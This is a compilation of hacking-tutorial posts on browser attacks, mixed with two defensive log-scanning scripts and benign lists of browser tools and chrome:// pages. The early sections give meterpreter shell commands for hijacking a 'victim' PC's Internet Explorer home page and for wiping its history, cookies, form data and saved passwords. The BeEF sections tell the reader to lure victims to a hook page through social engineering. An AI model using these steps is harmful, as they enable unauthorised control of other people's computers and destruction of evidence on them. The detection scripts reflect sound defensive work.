
Hack Internet Explorer in Remote PC set your desired Home page

First Hack the Victim PC Using Metasploit (Tutorial How to Hack Remote PC)

Once you have a meterpreter session, use the ‘shell’ command to get a command prompt on the target.

Set Your Desired Website as Home Page

Type the following commands in the command prompt. (Enter the web address of the desired website; here we have taken an example of http://www.hackingarticles.in/)

REG ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /V "Start Page" /D "http://www.hackingarticles.in/" /F


Now open Internet Explorer on the remote victim PC; the chosen webpage opens as the home page.


Stylish Home Page

(Use this link www.shinysearch.com  to put your own desired text.)

REG ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /V "Start Page" /D "http://www.shinysearch.com/myhome.php?theme=matrix&ltext=www.hackingarticles.in" /F


Check out this screenshot seen after opening the internet explorer.


Insert Your Image in Google Background

Type the following command.
(Refer to http://www.hackingarticles.in/insert-image-google-search/ to put your own desired image in the background.)

REG ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /V "Start Page" /D "http://www.shinysearch.com/myhome.php?style=mypic_full&img=b26b7e0e353d82b7642905e68ca5476e&ltext=Your%20Name" /F


Open Internet Explorer; the image appears in the Google search background.
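From the monitoring side, the REG ADD commands above can be spotted in process-creation logs. The following is an added example, not code from the original post: it flags command lines that set the IE "Start Page" value and checks the new URL against an allowlist. The allowlist host and the sample lines other than the first are constructed assumptions.

```python
import re
from urllib.parse import urlparse

# Hosts expected as an IE home page (assumed local policy, not from the page).
ALLOWED_HOSTS = {"intranet.example.com"}

KEY_RE = re.compile(
    r'\breg(?:\.exe)?"?\s+add\s+"?(?:HKCU|HKEY_CURRENT_USER)'
    r'\\Software\\Microsoft\\Internet Explorer\\Main"?(?=\s)', re.I)
VALUE_RE = re.compile(r'/v\s+"?Start Page"?(?=\s|$)', re.I)
DATA_RE = re.compile(r'/d\s+(?:"([^"]*)"|(\S+))', re.I)


def find_start_page_changes(command_lines):
    """Return one finding per command line that sets the IE Start Page value."""
    findings = []
    for line in command_lines:
        # Both the Main key and the "Start Page" value name must be present.
        if not (KEY_RE.search(line) and VALUE_RE.search(line)):
            continue
        m = DATA_RE.search(line)
        url = next((g for g in m.groups() if g), "") if m else ""
        host = (urlparse(url).hostname or "").lower()
        findings.append({"url": url, "host": host,
                         "allowed": host in ALLOWED_HOSTS})
    return findings


# Constructed process command lines, as recorded by command-line auditing
# (for example Sysmon event 1 or Security event 4688).
SAMPLE = [
    r'REG ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /V "Start Page" /D "http://www.hackingarticles.in/" /F',
    r'reg.exe add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /d "https://intranet.example.com/" /f',
    r'reg query "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page"',
    r'REG ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /V "Search Page" /D "http://search.example.net/" /F',
]

if __name__ == "__main__":
    for f in find_start_page_changes(SAMPLE):
        status = "ok" if f["allowed"] else "ALERT"
        print(f"{status}: Start Page set to {f['url']}")
```

Because the value lives under HKCU, the change is per user and needs no elevation, so the check has to cover every user's process activity rather than only administrative sessions.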

Playing with internet explorer in Remotely Hacked PC

First Hack the Victim PC Using Metasploit (Tutorial How to Hack Remote PC)

Once you have a meterpreter session, use the ‘shell’ command to get a command prompt on the target.

Delete Temporary Internet Files

RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 8


Delete Cookies

RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 2


Delete History

RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 1


Delete Form Data

RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 16


Delete Passwords

RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 32


Delete All

RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 255


Delete All + files and settings stored by Add-ons

RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 4351
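The number passed to ClearMyTracksByProcess is a bitmask, which is useful when triaging logs for browser-artifact wiping. The following is an added example, not code from the original post: it finds these commands in process command lines and decodes the mask using only the values listed above. The sample lines are constructed, and bits the page does not name individually are reported as a raw number.

```python
import re

# Bit meanings taken from the commands listed above. 4096 is the bit that
# 4351 adds on top of 255 (4351 - 255 = 4096).
FLAG_NAMES = {
    1: "history",
    2: "cookies",
    8: "temporary internet files",
    16: "form data",
    32: "passwords",
    4096: "add-on files and settings",
}

CMD_RE = re.compile(
    r'rundll32(?:\.exe)?"?\s+"?inetcpl\.cpl"?\s*,\s*'
    r'ClearMyTracksByProcess\s+(\d+)', re.I)


def decode_mask(mask):
    """Split a mask into named categories and leftover bits not named here."""
    named = [name for bit, name in sorted(FLAG_NAMES.items()) if mask & bit]
    unnamed = mask & ~sum(FLAG_NAMES)  # sum of the keys = all named bits
    return named, unnamed


def scan(command_lines):
    """Return a decoded record for every ClearMyTracksByProcess invocation."""
    hits = []
    for line in command_lines:
        m = CMD_RE.search(line)
        if not m:
            continue
        mask = int(m.group(1))
        named, unnamed = decode_mask(mask)
        hits.append({"mask": mask, "cleared": named, "unnamed_bits": unnamed})
    return hits


# Constructed process command lines for illustration.
SAMPLE = [
    r'RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 8',
    r'C:\Windows\System32\rundll32.exe InetCpl.cpl,ClearMyTracksByProcess 4351',
    r'rundll32.exe shell32.dll,Control_RunDLL inetcpl.cpl',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit["mask"], "->", ", ".join(hit["cleared"]),
              f"(other bits: {hit['unnamed_bits']})")
```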

How to Install BeEF in Windows PC

BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser. BeEF is pioneering techniques that provide the experienced penetration tester with practical client side attack vectors. Unlike other security frameworks, BeEF focuses on leveraging browser vulnerabilities to assess the security posture of a target. This project is developed solely for lawful research and penetration testing.

First download ruby for windows from here
Install it in C:\ folder and make sure you select all the options. So Ruby is installed now.


After installing Ruby, you need to download the SQLite dll from here
Now extract the SQLite zip file into the Ruby193\bin folder:


Now you need to download ‘DevKit-tdm-32-4.5.2-20111229-1559-sfx.exe’ from here
Now extract the ‘DevKit-tdm-32-4.5.2-20111229-1559-sfx.exe’ file into the C:\ folder

Open a cmd prompt, go to the ‘Devkit’ path and run "ruby dk.rb init"


Now we need to run "ruby dk.rb install"


Now a few other steps:
  • ruby dk.rb review (checks things are ok)
  • gem install rdiscount --platform=ruby (you should see the message "Temporarily enhancing PATH to include DevKit...")


Now you need to download the BeEF Project from here
Now open the BeEF file ‘beefproject-beef-beef-0.4.3.7-0-g69c59bb’ and extract the files to C:\beef

Open a cmd prompt, go to the BeEF path and type the following:
 ruby install

Now type the below commands one by one

gem install bundler
bundle install
(You will see something similar to this)


Now Type "ruby beef" to start beef.
 Of course you will need your Windows Firewall to allow that application :)



BeEF is installed successfully. Now go to http://127.0.0.1:3000/ui/panel and check if it is available 
http://192.168.1.2:3000/ui/panel (beef is the user name and password)

Send the link http://192.168.1.2:3000/demos/basic.html to the victim via chat, email or any social engineering technique.

Hcon Security Testing Framework

HconSTF is an open source penetration testing framework based on different browser technologies, which assists security professionals in penetration testing and vulnerability scanning assessments. It contains web tools which are powerful for XSS (cross-site scripting), SQL injection, siXSS, CSRF, Trace XSS, RFI, LFI, etc. It is useful to anybody interested in the information security domain: students, security professionals, web developers, those doing manual vulnerability assessments, and more.

Features
  • Categorized and comprehensive toolset
  • Contains hundreds of tools, features and scripts for different tasks like SQLi, XSS, Dorks and OSINT, to name a few
  • HconSTF webUI with online tools (same as the Aqua base version of HconSTF)
  • Each and every option is configured for penetration testing and Vulnerability assessments
  • Specially configured and enhanced for gaining easy & solid anonymity
  • Works for web app testing assessments, especially for the OWASP Top 10
  • Easy to use & collaborative Operating System like interface
  • Multi-Language support (feature in heavy development translators needed)


Sandcat Browser - Pen-Test Oriented Web Browser

Sandcat Browser is a freeware portable pen-test oriented multi-tabbed web browser with extensions support developed by the Syhunt team, the same creators of the Syhunt Web Application Security Scanner. The Sandcat Browser is built on top of Chromium, the same engine that powers the Google Chrome browser, and uses the Lua language to provide extensions and scripting support.

Sandcat Browser includes the following pen-test oriented features:
  • Live HTTP Headers
  • Request Editor Extension
  • Fuzzer extension with multiple modes and support for filters
  • JavaScript Executor extension -- allows you to load and run external JavaScript files
  • Lua Executor extension -- allows you to load and run external Lua scripts
  • Syhunt Gelo
  • HTTP Brute Force, CGI Scanner scripts and more



BeEF (Browser Exploitation Framework) Tutorial in BackTrack (Part 1)

BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser. The Browser Exploitation Framework (BeEF) is a powerful professional security tool.

BeEF focuses on leveraging browser vulnerabilities to assess the security posture of a target. This project is developed solely for lawful research and penetration testing. BeEF hooks one or more web browsers as beachheads for the launching of directed command modules. Each browser is likely to be within a different security context, and each context may provide a set of unique attack vectors.

How to Install Browser Exploitation Framework in BackTrack

First open BackTrack and follow this path:
Applications->Backtrack–>Exploitation Tools->Social Engineering Tools->BEEF XSS Framework>BeEF Installer


BeEF is now successfully installed on your PC.


How to use Browser Exploitation Framework 

Open BackTrack and follow this path:
Applications->Backtrack–>Exploitation Tools->Social Engineering Tools->BEEF XSS Framework>BeEF



Then copied the URL and launched it in the browser (this is my URL, based on the IP of my VirtualBox machine; yours will be different)

http://192.168.1.3:3000/ui/panel (beef is the user name and password)


Send the link http://192.168.1.3:3000/demos/basic.html to the victim via chat, email or any social engineering technique.


Now you can get access to the victim PC.



How to Check Your Browser Security

Qualys BrowserCheck 
Qualys BrowserCheck is a free tool that scans your browser and its plugins to find potential vulnerabilities and security holes and help you fix them.





Browser Scope
Browserscope is a community-driven project for profiling web browsers. The goals are to foster innovation by tracking browser functionality and to be a resource for web developers.




Panopticlick
Panopticlick checks if your browser’s configuration is unique. The more unique your browser, the less easily it could be tracked. Web tracking is a privacy risk for users.

Most Useful Google Chrome Browser chrome:// Commands

chrome://flags
From here you can enable some of the experimental features that are hidden in the Google Chrome browser. Please note that, as mentioned on this page, these are experimental, so they might not work as expected and might cause issues. Enable these features and use them at your own risk.



chrome://dns
This displays the list of hostnames for which the browser will prefetch the DNS records.


chrome://downloads
This is also available from the Menu -> Downloads. Short cut key is Ctrl+J


chrome://extensions
This is also available from the Menu -> Tools -> Extensions


chrome://bookmarks
This is also available from the Menu -> Bookmarks -> Bookmark Manager. Short cut key is Ctrl+Shift+O


chrome://history
This is also available from the Menu -> History. Short cut key is Ctrl+H


chrome://memory
This will redirect to “chrome://memory-redirect/”. This will display the memory used by the Google Chrome browser, and all other browsers running on the system (including Firefox).
This also displays all the processes related to the browser with their PID, process name, and the memory each takes.


chrome://net-internals
This displays all networking related information. Use this to capture network events generated by the browser. You can also export this data. You can view the DNS host resolver cache.
One of the important features here is “Test”. If a URL failed to load, you can go to “chrome://net-internals” -> click on the “Tests” tab -> type the URL which failed, and click on “Start Test”, which will run some tests and report why that URL failed.

chrome://quota-internals
This gives information about the disk space quota used by the browser, including the breakdown of how much space the individual websites took under temporary files.


chrome://sessions
This displays the number of sessions and magic list that are currently running.



chrome://settings
This is also available from the Menu -> Options (on Windows), and Menu -> Preferences (on Linux). From here you can control various browser related settings.


chrome://sync-internals
This gives information about the chrome sync feature, including the Sync URL used by google, and sync statistics.

Finally, to view all the available chrome:// commands, type chrome://about/ in your chrome browser URL as shown below.